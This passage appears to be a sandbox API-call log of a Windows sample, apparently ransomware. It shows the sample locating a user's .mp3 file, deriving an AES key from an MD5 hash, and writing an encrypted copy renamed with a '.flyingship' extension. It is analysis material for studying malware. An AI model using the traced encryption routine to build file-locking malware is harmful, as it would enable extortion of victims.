lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ADuuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Duuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uuj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uj\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AXe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xe49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="49W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SJDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JDN r.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.631] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.631] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0181.631] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.632] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.632] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0xc516f910, ftLastWriteTime.dwHighDateTime=0x1d5e463, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 0x90af58 [0181.632] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.632] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.633] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.633] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.633] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0181.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0181.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.633] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0181.635] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0181.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.635] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0181.670] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.671] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0181.671] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.671] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.671] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0181.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.671] CryptDestroyHash (hHash=0x90ae18) returned 1 [0181.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\axe49w4a sjdn r.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.673] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.673] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0181.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0181.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0181.675] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj")) returned 0x10 [0181.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0181.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0181.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0181.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0181.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\axe49w4a sjdn r.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0181.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0181.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | 